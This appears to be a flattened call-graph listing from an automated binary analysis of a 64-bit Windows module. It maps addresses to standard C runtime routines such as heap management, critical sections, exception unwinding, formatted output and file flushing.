16655->16657 16658 7fef75388a7 HeapSetInformation 16655->16658 16657->16656 16658->16657 17710 7fef7545260 17711 7fef7545296 __SehTransFilter _CreateFrameInfo 17710->17711 17712 7fef753ed30 _FindAndUnlinkFrame 36 API calls 17711->17712 17713 7fef75453e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 17712->17713 17053 7fef754bb66 17054 7fef754bb78 _CrtMemDumpAllObjectsSince wcsxfrm 17053->17054 17055 7fef754bc46 17054->17055 17057 7fef754b99c 17054->17057 17056 7fef753bd70 _invalid_parameter 17 API calls 17055->17056 17062 7fef754bb0e _LocaleUpdate::~_LocaleUpdate 17056->17062 17058 7fef754cc93 17057->17058 17060 7fef754bada 17057->17060 17059 7fef753bd70 _invalid_parameter 17 API calls 17058->17059 17058->17062 17059->17062 17064 7fef753bd70 _invalid_parameter 17 API calls 17060->17064 17061 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17063 7fef754cd90 17061->17063 17062->17061 17064->17062 18245 7fef753ae14 18246 7fef753b390 18245->18246 18247 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18246->18247 18248 7fef753b3a0 18247->18248 18249 7fef7540215 18250 7fef7540231 18249->18250 18260 7fef7540302 18249->18260 18320 7fef7548c80 18250->18320 18252 7fef7540489 18255 7fef7542d80 17 API calls 18252->18255 18254 7fef7537ff0 _invoke_watson_if_error 16 API calls 18257 7fef754027e OutputDebugStringW 18254->18257 18258 7fef75404a3 18255->18258 18256 7fef754040d 18256->18252 18261 7fef7541640 17 API calls 18256->18261 18262 7fef7540296 OutputDebugStringW OutputDebugStringW OutputDebugStringW OutputDebugStringW 18257->18262 18259 7fef7537ff0 _invoke_watson_if_error 16 API calls 18258->18259 18263 7fef75404d0 18259->18263 18260->18256 18327 7fef7548c30 18260->18327 18265 7fef754045c 18261->18265 18273 7fef75402f2 18262->18273 18268 7fef754053d 18263->18268 18269 7fef7542d80 17 API calls 18263->18269 18275 7fef7540583 18263->18275 18267 7fef7537ff0 _invoke_watson_if_error 16 API calls 18265->18267 18267->18252 18270 7fef7542d80 17 API calls 18268->18270 18271 7fef7540510 18269->18271 18272 7fef7540556 18270->18272 18277 7fef7537ff0 _invoke_watson_if_error 16 API calls 18271->18277 18278 7fef7537ff0 _invoke_watson_if_error 16 API calls 18272->18278 18279 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18273->18279 18274 7fef7540357 18276 7fef75403af 18274->18276 18280 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 18274->18280 18330 7fef7541590 18275->18330 18276->18256 18281 7fef7541640 17 API calls 18276->18281 18277->18268 18278->18275 18282 7fef7540cae 18279->18282 18280->18276 18284 7fef75403e0 18281->18284 18285 7fef7537ff0 _invoke_watson_if_error 16 API calls 18284->18285 18285->18256 18286 7fef75405fa 18287 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 18286->18287 18288 7fef7540652 18286->18288 18287->18288 18289 7fef7541640 17 API calls 18288->18289 18291 7fef75406b0 18288->18291 18290 7fef7540683 18289->18290 18292 7fef7537ff0 _invoke_watson_if_error 16 API calls 18290->18292 18293 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 18291->18293 18292->18291 18294 7fef7540769 18293->18294 18295 7fef753d490 std::exception::_Copy_str 17 API calls 18294->18295 18310 7fef75407bd 18294->18310 18296 7fef7540790 18295->18296 18297 7fef7537ff0 _invoke_watson_if_error 16 API calls 18296->18297 18297->18310 18298 7fef7540905 18298->18273 18299 7fef7540a26 18298->18299 18300 7fef75409a4 GetFileType 18298->18300 18301 7fef7540ba5 18299->18301 18302 7fef7540b97 OutputDebugStringW 18299->18302 18304 7fef75409d0 18300->18304 18309 7fef75409ce 18300->18309 18301->18273 18305 7fef7540c23 18301->18305 18306 7fef7548c80 _itow_s 17 API calls 18301->18306 18302->18301 18307 7fef75409dd WriteConsoleW 18304->18307 18334 7fef753b470 18305->18334 18308 7fef7540bf6 18306->18308 18307->18299 18311 7fef7540a2b GetLastError 18307->18311 18312 7fef7537ff0 _invoke_watson_if_error 16 API calls 18308->18312 18313 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 18309->18313 18310->18298 18333 7fef7539360 LeaveCriticalSection 18310->18333 18311->18299 18311->18309 18312->18305 18315 7fef7540ab5 18313->18315 18316 7fef7540b26 WriteFile 18315->18316 18317 7fef7540ad0 18315->18317 18316->18299 18319 7fef7540add WriteFile 18317->18319 18319->18299 18321 7fef7548cd3 18320->18321 18322 7fef7548ca6 18320->18322 18323 7fef7548d00 _itow_s 17 API calls 18321->18323 18322->18321 18324 7fef7548cad 18322->18324 18326 7fef7540251 18323->18326 18360 7fef7548d00 18324->18360 18326->18254 18376 7fef75486b0 18327->18376 18329 7fef7548c74 18329->18274 18331 7fef75486b0 _wcsftime_l 17 API calls 18330->18331 18332 7fef75415de 18331->18332 18332->18286 18333->18298 18335 7fef753b48d 18334->18335 18336 7fef753b4c4 18335->18336 18337 7fef753b4ce GetModuleFileNameW 18335->18337 18340 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18336->18340 18338 7fef753b4f2 18337->18338 18344 7fef753b538 18337->18344 18339 7fef7541640 17 API calls 18338->18339 18341 7fef753b50b 18339->18341 18342 7fef753ba58 18340->18342 18343 7fef7537ff0 _invoke_watson_if_error 16 API calls 18341->18343 18342->18273 18343->18344 18345 7fef7540fd0 17 API calls 18344->18345 18348 7fef753b5f2 18344->18348 18346 7fef753b5c5 18345->18346 18347 7fef7537ff0 _invoke_watson_if_error 16 API calls 18346->18347 18347->18348 18349 7fef7541590 _snwprintf_s 17 API calls 18348->18349 18350 7fef753b940 18349->18350 18351 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 18350->18351 18352 7fef753b998 18350->18352 18351->18352 18353 7fef7541640 17 API calls 18352->18353 18356 7fef753b9f6 18352->18356 18354 7fef753b9c9 18353->18354 18355 7fef7537ff0 _invoke_watson_if_error 16 API calls 18354->18355 18355->18356 18356->18336 18357 7fef753cff0 terminate 34 API calls 18356->18357 18358 7fef753ba2b 18357->18358 18359 7fef7537090 _exit 33 API calls 18358->18359 18359->18336 18361 7fef7548d25 18360->18361 18362 7fef7548d7b 18361->18362 18364 7fef7548db9 18361->18364 18363 7fef753bd70 _invalid_parameter 17 API calls 18362->18363 18373 7fef7548daf 18363->18373 18365 7fef7548e1a 18364->18365 18367 7fef7548e58 _calloc_dbg_impl 18364->18367 18366 7fef753bd70 _invalid_parameter 17 API calls 18365->18366 18366->18373 18368 7fef7548f5d 18367->18368 18369 7fef7548f9b 18367->18369 18370 7fef753bd70 _invalid_parameter 17 API calls 18368->18370 18371 7fef754900e 18369->18371 18374 7fef754904c 18369->18374 18370->18373 18372 7fef753bd70 _invalid_parameter 17 API calls 18371->18372 18372->18373 18373->18326 18374->18373 18375 7fef753bd70 _invalid_parameter 17 API calls 18374->18375 18375->18373 18378 7fef75486e6 18376->18378 18377 7fef754873c 18379 7fef753bd70 _invalid_parameter 17 API calls 18377->18379 18378->18377 18380 7fef754877a 18378->18380 18388 7fef7548770 _calloc_dbg_impl 18379->18388 18381 7fef754880e 18380->18381 18382 7fef754884c 18380->18382 18380->18388 18385 7fef753bd70 _invalid_parameter 17 API calls 18381->18385 18383 7fef7548992 18382->18383 18384 7fef7548862 18382->18384 18386 7fef7548350 _wcsftime_l 17 API calls 18383->18386 18391 7fef7548350 18384->18391 18385->18388 18389 7fef75488b1 _calloc_dbg_impl 18386->18389 18388->18329 18389->18388 18390 7fef753bd70 _invalid_parameter 17 API calls 18389->18390 18390->18388 18393 7fef754839b 18391->18393 18392 7fef75483f1 18394 7fef753bd70 _invalid_parameter 17 API calls 18392->18394 18393->18392 18395 7fef754842f 18393->18395 18397 7fef7548425 18394->18397 18396 7fef753bd70 _invalid_parameter 17 API calls 18395->18396 18395->18397 18396->18397 18397->18389 17068 7fef754d410 17073 7fef754d3e0 17068->17073 17071 7fef754d43c 17080 7fef7550070 17073->17080 17076 7fef754d710 17077 7fef754d721 17076->17077 17078 7fef754d726 17076->17078 17077->17071 17085 7fef7539360 LeaveCriticalSection 17078->17085 17083 7fef7550083 _free_nolock 17080->17083 17082 7fef754d402 17082->17071 17082->17076 17084 7fef7539360 LeaveCriticalSection 17083->17084 17084->17082 17085->17077 17086 7fef7542c10 17087 7fef7542c53 17086->17087 17088 7fef7542c24 _updatetlocinfoEx_nolock 17086->17088 17090 7fef7539360 LeaveCriticalSection 17088->17090 17090->17087 16482 7fef753461b 16483 7fef7534625 _calloc_dbg_impl 16482->16483 16486 7fef7539360 LeaveCriticalSection 16483->16486 16485 7fef75348be 16486->16485 17091 7fef7537816 17092 7fef7537826 _calloc_dbg 17091->17092 17095 7fef7537ab9 17092->17095 17096 7fef7537a32 InitializeCriticalSectionAndSpinCount 17092->17096 17097 7fef7537a19 GetFileType 17092->17097 17093 7fef7537ce0 SetHandleCount 17094 7fef7537aaf 17093->17094 17095->17093 17098 7fef7537b95 GetStdHandle 17095->17098 17099 7fef7537c7b 17095->17099 17096->17094 17096->17095 17097->17095 17097->17096 17098->17099 17100 7fef7537bb9 17098->17100 17099->17093 17100->17099 17101 7fef7537bc8 GetFileType 17100->17101 17101->17099 17102 7fef7537beb InitializeCriticalSectionAndSpinCount 17101->17102 17102->17094 17102->17099 18398 7fef7546203 18400 7fef754616e _CrtMemDumpAllObjectsSince wcsxfrm 18398->18400 18399 7fef7546238 MultiByteToWideChar 18401 7fef75461c8 _LocaleUpdate::~_LocaleUpdate 18399->18401 18400->18399 18400->18401 18402 7fef7550204 18404 7fef755023d 18402->18404 18403 7fef755028d 18404->18403 18405 7fef754ab10 17 API calls 18404->18405 18406 7fef7550326 18404->18406 18405->18406 18406->18403 18407 7fef7549290 23 API calls 18406->18407 18407->18403 18408 7fef7551200 18409 7fef753ed30 _FindAndUnlinkFrame 36 API calls 18408->18409 18410 7fef7551212 _IsExceptionObjectToBeDestroyed __SehTransFilter 18409->18410 17740 7fef754c30d 17741 7fef754c31a get_int64_arg _get_printf_count_output 17740->17741 17742 7fef754c39d 17741->17742 17753 7fef754c3f2 17741->17753 17743 7fef753bd70 _invalid_parameter 17 API calls 17742->17743 17751 7fef754bb0e _LocaleUpdate::~_LocaleUpdate 17743->17751 17744 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17746 7fef754cd90 17744->17746 17745 7fef754b99c 17747 7fef754cc93 17745->17747 17750 7fef754bada 17745->17750 17749 7fef753bd70 _invalid_parameter 17 API calls 17747->17749 17747->17751 17748 7fef754b530 wctomb_s 19 API calls 17748->17753 17749->17751 17752 7fef753bd70 _invalid_parameter 17 API calls 17750->17752 17751->17744 17752->17751 17753->17745 17753->17748 17109 7fef7533409 17110 7fef7533e00 3 API calls 17109->17110 17111 7fef753340e 17110->17111 17114 7fef75388d0 HeapDestroy 17111->17114 17113 7fef7533413 17114->17113 18728 7fef7533909 18729 7fef7533913 __SehTransFilter 18728->18729 18730 7fef75339db __SehTransFilter 18729->18730 18731 7fef7533a71 RtlUnwindEx 18729->18731 18731->18730 17115 7fef7536c32 17116 7fef7536c3c 17115->17116 17117 7fef7536e25 _LocaleUpdate::~_LocaleUpdate 17116->17117 17119 7fef7536c7a _CrtMemDumpAllObjectsSince 17116->17119 17118 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17117->17118 17120 7fef7536e89 17118->17120 17121 7fef753c260 _CrtMemDumpAllObjectsSince_stat 3 API calls 17119->17121 17122 7fef7536ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 17119->17122 17121->17122 17123 7fef753c0c0 _swprintf_p 17 API calls 17122->17123 17125 7fef7536dc7 17123->17125 17124 7fef7536e12 17125->17124 17126 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 17125->17126 17126->17124 16236 7fef7533433 16237 7fef7533437 16236->16237 16241 7fef7533446 16236->16241 16244 7fef7537d00 16237->16244 16246 7fef7537d0e 16244->16246 16245 7fef753343c 16248 7fef7533e00 16245->16248 16246->16245 16247 7fef7537d87 DeleteCriticalSection 16246->16247 16247->16246 16249 7fef7533e23 16248->16249 16250 7fef7533e0d FlsFree 16248->16250 16254 7fef75390b0 16249->16254 16250->16249 16253 7fef75388d0 HeapDestroy 16253->16241 16257 7fef75390be 16254->16257 16255 7fef75390fd DeleteCriticalSection 16255->16257 16256 7fef7533441 16256->16253 16257->16255 16258 7fef753914d 16257->16258 16258->16256 16259 7fef7539196 DeleteCriticalSection 16258->16259 16259->16258 17127 7fef754c435 17128 7fef754c479 _CrtMemDumpAllObjectsSince 17127->17128 17129 7fef754c598 DecodePointer 17128->17129 17130 7fef754c60d _CrtMemDumpAllObjectsSince 17129->17130 17131 7fef754c62b DecodePointer 17130->17131 17132 7fef754c652 _CrtMemDumpAllObjectsSince 17130->17132 17131->17132 17133 7fef754c676 DecodePointer 17132->17133 17143 7fef754c69d std::exception::_Copy_str 17132->17143 17133->17143 17134 7fef754b99c 17135 7fef754cc93 17134->17135 17138 7fef754bada 17134->17138 17137 7fef753bd70 _invalid_parameter 17 API calls 17135->17137 17140 7fef754bb0e _LocaleUpdate::~_LocaleUpdate 17135->17140 17136 7fef754b530 wctomb_s 19 API calls 17136->17143 17137->17140 17142 7fef753bd70 _invalid_parameter 17 API calls 17138->17142 17139 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17141 7fef754cd90 17139->17141 17140->17139 17142->17140 17143->17134 17143->17136 16269 7fef7533d30 16287 7fef7537540 16269->16287 16274 7fef7533d42 16276 7fef7533e00 3 API calls 16274->16276 16275 7fef7533d4e FlsAlloc 16277 7fef7533d73 _calloc_dbg 16275->16277 16278 7fef7533d6a 16275->16278 16279 7fef7533d47 16276->16279 16281 7fef7533da4 FlsSetValue 16277->16281 16282 7fef7533db9 16277->16282 16280 7fef7533e00 3 API calls 16278->16280 16280->16279 16281->16282 16283 7fef7533dc2 16281->16283 16284 7fef7533e00 3 API calls 16282->16284 16296 7fef7533e30 16283->16296 16284->16279 16302 7fef7533d00 RtlEncodePointer 16287->16302 16289 7fef7537549 _initp_misc_winsig 16303 7fef753cf20 EncodePointer 16289->16303 16291 7fef7533d39 16292 7fef7538fe0 16291->16292 16294 7fef7538ff6 16292->16294 16293 7fef7539022 InitializeCriticalSectionAndSpinCount 16293->16294 16295 7fef7533d3e 16293->16295 16294->16293 16294->16295 16295->16274 16295->16275 16297 7fef7533ead 16296->16297 16304 7fef7539360 LeaveCriticalSection 16297->16304 16299 7fef7533ec7 _updatetlocinfoEx_nolock 16305 7fef7539360 LeaveCriticalSection 16299->16305 16301 7fef7533dce GetCurrentThreadId 16301->16279 16302->16289 16303->16291 16304->16299 16305->16301 17144 7fef753e830 17145 7fef753e857 17144->17145 17148 7fef7543cc0 17145->17148 17149 7fef7543cdd 17148->17149 17150 7fef7543d82 17149->17150 17152 7fef7543ef3 __SehTransFilter 17149->17152 17159 7fef753e8e3 17149->17159 17154 7fef7543dc8 17150->17154 17157 7fef7543e40 17150->17157 17150->17159 17152->17159 17186 7fef75440b0 17152->17186 17153 7fef7543ebd 17153->17159 17179 7fef753e790 17153->17179 17166 7fef7543a60 17154->17166 17157->17153 17160 7fef7543e93 17157->17160 17161 7fef753cf80 _inconsistency 36 API calls 17157->17161 17164 7fef7544f20 __SehTransFilter 36 API calls 17160->17164 17161->17160 17162 7fef753cf80 _inconsistency 36 API calls 17163 7fef7543e08 17162->17163 17172 7fef7544f20 17163->17172 17164->17153 17167 7fef7543a7b 17166->17167 17168 7fef7543a7d 17166->17168 17170 7fef753cf80 _inconsistency 36 API calls 17167->17170 17171 7fef7543aa5 17167->17171 17169 7fef753cf80 _inconsistency 36 API calls 17168->17169 17169->17167 17170->17171 17171->17162 17171->17163 17231 7fef7543b70 17172->17231 17174 7fef7545103 17176 7fef754514a __SetState 17174->17176 17177 7fef753cf80 _inconsistency 36 API calls 17174->17177 17175 7fef753cf80 _inconsistency 36 API calls 17178 7fef7544f55 __SehTransFilter _SetImageBase __SetState 17175->17178 17176->17159 17177->17176 17178->17174 17178->17175 17238 7fef753e500 17179->17238 17182 7fef7543b40 __StateFromControlPc 36 API calls 17183 7fef753e7d0 __SehTransFilter 17182->17183 17184 7fef7544f20 __SehTransFilter 36 API calls 17183->17184 17185 7fef753e81e 17184->17185 17185->17159 17187 7fef7543b40 __StateFromControlPc 36 API calls 17186->17187 17188 7fef75440ea 17187->17188 17189 7fef753e500 __GetUnwindTryBlock 37 API calls 17188->17189 17190 7fef7544110 17189->17190 17243 7fef7543c70 17190->17243 17193 7fef7544133 __SetState 17246 7fef7543c00 17193->17246 17194 7fef7544176 17195 7fef7543c70 __GetUnwindTryBlock 37 API calls 17194->17195 17196 7fef7544174 17195->17196 17198 7fef753cf80 _inconsistency 36 API calls 17196->17198 17199 7fef75441af _ValidateRead _SetThrowImageBase 17196->17199 17198->17199 17201 7fef7544347 17199->17201 17207 7fef7544235 17199->17207 17215 7fef753cf80 _inconsistency 36 API calls 17199->17215 17218 7fef754428e 17199->17218 17200 7fef75447d9 17202 7fef75447f3 17200->17202 17203 7fef7544847 17200->17203 17208 7fef75447d7 17200->17208 17201->17200 17204 7fef75443f5 17201->17204 17276 7fef7544960 17202->17276 17206 7fef753cf50 terminate 35 API calls 17203->17206 17211 7fef754466c __SehTransFilter 17204->17211 17261 7fef753ea30 17204->17261 17206->17208 17207->17159 17208->17207 17210 7fef753cf80 _inconsistency 36 API calls 17208->17210 17210->17207 17211->17208 17212 7fef7545bb0 __SehTransFilter 36 API calls 17211->17212 17213 7fef7544727 17212->17213 17213->17208 17214 7fef753e500 __GetUnwindTryBlock 37 API calls 17213->17214 17216 7fef7544767 17214->17216 17215->17218 17273 7fef753edc0 RtlUnwindEx 17216->17273 17219 7fef753cf80 _inconsistency 36 API calls 17218->17219 17220 7fef75442fa 17218->17220 17219->17220 17220->17201 17249 7fef7545bb0 17220->17249 17221 7fef7544450 __SehTransFilter 17221->17211 17266 7fef7545180 17221->17266 17224 7fef7544340 __SehTransFilter 17224->17201 17225 7fef7544393 17224->17225 17226 7fef754435a __SehTransFilter 17224->17226 17227 7fef753cf50 terminate 35 API calls 17225->17227 17255 7fef7544870 17226->17255 17227->17201 17232 7fef7543b9a 17231->17232 17234 7fef7543ba9 17231->17234 17235 7fef7543b40 17232->17235 17234->17178 17236 7fef7543a60 __StateFromControlPc 36 API calls 17235->17236 17237 7fef7543b65 17236->17237 17237->17234 17239 7fef7543b40 __StateFromControlPc 36 API calls 17238->17239 17240 7fef753e539 17239->17240 17241 7fef753e5c2 RtlLookupFunctionEntry 17240->17241 17242 7fef753e601 17240->17242 17241->17242 17242->17182 17244 7fef753e500 __GetUnwindTryBlock 37 API calls 17243->17244 17245 7fef7543c9c 17244->17245 17245->17193 17245->17194 17247 7fef753e500 __GetUnwindTryBlock 37 API calls 17246->17247 17248 7fef7543c31 17247->17248 17248->17196 17250 7fef7545bc8 17249->17250 17252 7fef7545bc6 17249->17252 17251 7fef753cf80 _inconsistency 36 API calls 17250->17251 17251->17252 17253 7fef753cf50 terminate 35 API calls 17252->17253 17254 7fef7545bda __SehTransFilter 17252->17254 17253->17254 17254->17224 17286 7fef754d4e0 17255->17286 17258 7fef754d320 17259 7fef754d375 17258->17259 17260 7fef754d3ba RaiseException 17259->17260 17260->17201 17262 7fef7543b40 __StateFromControlPc 36 API calls 17261->17262 17263 7fef753ea6f 17262->17263 17264 7fef753cf80 _inconsistency 36 API calls 17263->17264 17265 7fef753ea7a 17263->17265 17264->17265 17265->17221 17267 7fef753e500 __GetUnwindTryBlock 37 API calls 17266->17267 17268 7fef75451c1 17267->17268 17270 7fef75451f0 __SehTransFilter 17268->17270 17293 7fef7545970 17268->17293 17271 7fef753edc0 __SehTransFilter 9 API calls 17270->17271 17272 7fef7545259 17271->17272 17272->17221 17274 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17273->17274 17275 7fef753eee7 17274->17275 17275->17208 17278 7fef7544990 17276->17278 17283 7fef754498b 17276->17283 17277 7fef75449b2 __SehTransFilter 17279 7fef7544a41 17277->17279 17280 7fef753cf80 _inconsistency 36 API calls 17277->17280 17277->17283 17278->17277 17310 7fef7533d00 RtlEncodePointer 17278->17310 17281 7fef753ea30 __SehTransFilter 36 API calls 17279->17281 17280->17279 17284 7fef7544a8e __SehTransFilter 17281->17284 17283->17208 17284->17283 17285 7fef7545180 __SehTransFilter 38 API calls 17284->17285 17285->17283 17289 7fef754d660 17286->17289 17290 7fef754437d 17289->17290 17291 7fef754d676 std::exception::_Copy_str malloc 17289->17291 17290->17258 17291->17290 17292 7fef753d490 std::exception::_Copy_str 17 API calls 17291->17292 17292->17290 17294 7fef7545998 17293->17294 17297 7fef75455f0 17294->17297 17296 7fef75459d3 __SehTransFilter __AdjustPointer 17296->17270 17298 7fef754561e __SehTransFilter 17297->17298 17299 7fef7545765 17298->17299 17300 7fef75456fa _ValidateRead 17298->17300 17308 7fef75456aa __SehTransFilter __AdjustPointer 17298->17308 17301 7fef754577a _ValidateRead 17299->17301 17302 7fef7545813 __SehTransFilter 17299->17302 17303 7fef753cf80 _inconsistency 36 API calls 17300->17303 17300->17308 17304 7fef753cf80 _inconsistency 36 API calls 17301->17304 17301->17308 17305 7fef754584d _ValidateRead 17302->17305 17309 7fef75458c6 __SehTransFilter _ValidateExecute _ValidateRead 17302->17309 17303->17308 17304->17308 17306 7fef753cf80 _inconsistency 36 API calls 17305->17306 17305->17308 17306->17308 17307 7fef753cf80 _inconsistency 36 API calls 17307->17308 17308->17296 17309->17307 17309->17308 17310->17277 18732 7fef7533130 18733 7fef7533170 __GSHandlerCheck 8 API calls 18732->18733 18734 7fef7533160 18733->18734 17311 7fef754d830 17312 7fef754d8aa 17311->17312 17313 7fef754d926 17312->17313 17315 7fef754d97b 17312->17315 17314 7fef753bd70 _invalid_parameter 17 API calls 17313->17314 17318 7fef754d95a _LocaleUpdate::~_LocaleUpdate 17314->17318 17316 7fef754d9ee 17315->17316 17322 7fef754da43 17315->17322 17317 7fef753bd70 _invalid_parameter 17 API calls 17316->17317 17317->17318 17319 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17318->17319 17320 7fef754ed9e 17319->17320 17321 7fef754eca1 17321->17318 17323 7fef753bd70 _invalid_parameter 17 API calls 17321->17323 17322->17321 17324 7fef754dbb5 17322->17324 17323->17318 17325 7fef753bd70 _invalid_parameter 17 API calls 17324->17325 17325->17318 18426 7fef7543e3b 18427 7fef7543ec7 18426->18427 18428 7fef753e790 __SehTransFilter 37 API calls 18427->18428 18429 7fef7543ee4 18428->18429 17326 7fef753443c 17327 7fef753444c 17326->17327 17330 7fef7539360 LeaveCriticalSection 17327->17330 17329 7fef75348be 17330->17329 18744 7fef7549939 18745 7fef7549951 __doserrno 18744->18745 18746 7fef753bd70 _invalid_parameter 17 API calls 18745->18746 18747 7fef75499d7 18746->18747 18748 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18747->18748 18749 7fef754a9f5 18748->18749 17331 7fef754e424 17332 7fef754e469 _CrtMemDumpAllObjectsSince 17331->17332 17333 7fef754e588 DecodePointer 17332->17333 17334 7fef754e5fd _CrtMemDumpAllObjectsSince 17333->17334 17335 7fef754e61b DecodePointer 17334->17335 17336 7fef754e642 _CrtMemDumpAllObjectsSince 17334->17336 17335->17336 17337 7fef754e666 DecodePointer 17336->17337 17339 7fef754e68d std::exception::_Copy_str 17336->17339 17337->17339 17338 7fef754eadf 17341 7fef754ef10 25 API calls 17338->17341 17339->17338 17340 7fef754eec0 25 API calls 17339->17340 17347 7fef754da75 17339->17347 17340->17338 17342 7fef754eafd 17341->17342 17343 7fef754eb33 17342->17343 17345 7fef754eec0 25 API calls 17342->17345 17344 7fef754ec29 17343->17344 17358 7fef754eb49 _CrtMemDumpAllObjectsSince 17343->17358 17346 7fef754ef10 25 API calls 17344->17346 17345->17343 17348 7fef754ebda 17346->17348 17349 7fef754eca1 17347->17349 17351 7fef754dbb5 17347->17351 17348->17347 17352 7fef754eec0 25 API calls 17348->17352 17350 7fef753bd70 _invalid_parameter 17 API calls 17349->17350 17353 7fef754dbe9 _LocaleUpdate::~_LocaleUpdate 17349->17353 17350->17353 17356 7fef753bd70 _invalid_parameter 17 API calls 17351->17356 17352->17347 17354 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17353->17354 17355 7fef754ed9e 17354->17355 17356->17353 17357 7fef754f000 wcsxfrm 2 API calls 17357->17358 17358->17348 17358->17357 17359 7fef754ee40 25 API calls 17358->17359 17359->17358 18430 7fef7535a25 18431 7fef7535a37 18430->18431 18432 7fef753bd70 _invalid_parameter 17 API calls 18431->18432 18433 7fef7535aaf 18432->18433 18761 7fef7544920 18764 7fef754d530 18761->18764 18767 7fef754d580 18764->18767 18768 7fef754d59a std::exception::_Tidy 18767->18768 18769 7fef754493d 18767->18769 18768->18769 18770 7fef754d660 std::exception::_Copy_str 17 API calls 18768->18770 18770->18769 18771 7fef753b12b 18772 7fef753b14c 18771->18772 18774 7fef753b2e0 18772->18774 18775 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 18772->18775 18773 7fef753b33e 18777 7fef7540cc0 25 API calls 18773->18777 18774->18773 18776 7fef753d490 std::exception::_Copy_str 17 API calls 18774->18776 18775->18774 18778 7fef753b311 18776->18778 18779 7fef753b358 18777->18779 18780 7fef7537ff0 _invoke_watson_if_error 16 API calls 18778->18780 18781 7fef753b37d 18779->18781 18782 7fef753cff0 terminate 34 API calls 18779->18782 18780->18773 18785 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18781->18785 18783 7fef753b373 18782->18783 18784 7fef7537090 _exit 33 API calls 18783->18784 18784->18781 18786 7fef753b3a0 18785->18786 17785 7fef754ff2d 17786 7fef754ff37 17785->17786 17787 7fef7550042 17786->17787 17788 7fef754ff47 17786->17788 17813 7fef7539360 LeaveCriticalSection 17787->17813 17789 7fef755003d 17788->17789 17800 7fef754ae90 17788->17800 17791 7fef755004c 17793 7fef754ff97 17794 7fef754ffd0 17793->17794 17796 7fef754ffe1 17793->17796 17797 7fef754ffbb 17793->17797 17795 7fef754af60 _unlock_file2 2 API calls 17794->17795 17795->17789 17796->17794 17799 7fef754fd70 _fflush_nolock 25 API calls 17796->17799 17803 7fef754fd70 17797->17803 17799->17794 17801 7fef754aec8 EnterCriticalSection 17800->17801 17802 7fef754aea4 17800->17802 17801->17802 17802->17793 17804 7fef754fd81 17803->17804 17805 7fef754fd8a 17803->17805 17814 7fef754ff00 17804->17814 17829 7fef754fdf0 17805->17829 17808 7fef754fd94 17809 7fef754afb0 _fflush_nolock 17 API calls 17808->17809 17812 7fef754fd88 17808->17812 17810 7fef754fdba 17809->17810 17833 7fef75507c0 17810->17833 17812->17794 17813->17791 17815 7fef754ff22 17814->17815 17816 7fef7550042 17815->17816 17817 7fef754ff47 17815->17817 17849 7fef7539360 LeaveCriticalSection 17816->17849 17818 7fef755003d 17817->17818 17821 7fef754ae90 _lock_file2 EnterCriticalSection 17817->17821 17818->17812 17820 7fef755004c 17820->17812 17822 7fef754ff97 17821->17822 17824 7fef754ffe1 17822->17824 17825 7fef754ffbb 17822->17825 17828 7fef754ffd0 17822->17828 17823 7fef754af60 _unlock_file2 2 API calls 17823->17818 17827 7fef754fd70 _fflush_nolock 25 API calls 17824->17827 17824->17828 17826 7fef754fd70 _fflush_nolock 25 API calls 17825->17826 17826->17828 17827->17828 17828->17823 17830 7fef754fe1f 17829->17830 17832 7fef754fe5d 17829->17832 17831 7fef754afb0 _fflush_nolock 17 API calls 17830->17831 17830->17832 17831->17832 17832->17808 17834 7fef75507e8 17833->17834 17835 7fef75507d3 17833->17835 17836 7fef7550851 17834->17836 17841 7fef755088f 17834->17841 17835->17812 17837 7fef753bd70 _invalid_parameter 17 API calls 17836->17837 17837->17835 17838 7fef7550913 17843 7fef753bd70 _invalid_parameter 17 API calls 17838->17843 17839 7fef7550951 17840 7fef754fae0 _fflush_nolock 3 API calls 17839->17840 17842 7fef755095a 17840->17842 17841->17838 17841->17839 17844 7fef754f900 _fflush_nolock 17 API calls 17842->17844 17848 7fef75509ab __doserrno 17842->17848 17843->17835 17845 7fef7550992 FlushFileBuffers 17844->17845 17846 7fef755099f GetLastError 17845->17846 17845->17848 17846->17848 17850 7fef754fbc0 LeaveCriticalSection 17848->17850 17849->17820 17850->17835 17851 7fef7539328 17852 7fef753932c 17851->17852 17853 7fef7539336 EnterCriticalSection 17851->17853 17852->17853 18791 7fef75334d5 18792 7fef75334da _calloc_dbg 18791->18792 18793 7fef753350b FlsSetValue 18792->18793 18794 7fef7533548 18792->18794 18793->18794 18795 7fef7533520 18793->18795 18796 7fef7533e30 LeaveCriticalSection 18795->18796 18797 7fef753352c GetCurrentThreadId 18796->18797 18797->18794 17854 7fef75366da 17855 7fef7536725 17854->17855 17856 7fef7536745 17854->17856 17855->17856 17860 7fef7539a70 17855->17860 17857 7fef753677f 17856->17857 17859 7fef7539b10 __updatetmbcinfo LeaveCriticalSection 17856->17859 17859->17857 17862 7fef7539a79 _updatetlocinfoEx_nolock 17860->17862 17861 7fef7539ad8 17861->17856 17862->17861 17864 7fef7539360 LeaveCriticalSection 17862->17864 17864->17861 17360 7fef75333d6 17363 7fef75388d0 HeapDestroy 17360->17363 17362 7fef75333db 17363->17362 17876 7fef7535ad9 17877 7fef7535add 17876->17877 17878 7fef7536380 _CrtIsValidHeapPointer HeapValidate 17877->17878 17879 7fef7535b3a 17878->17879 17882 7fef7539360 LeaveCriticalSection 17879->17882 17881 7fef7535c14 17882->17881 18798 7fef75368c4 18799 7fef75368d1 18798->18799 18800 7fef7536ba6 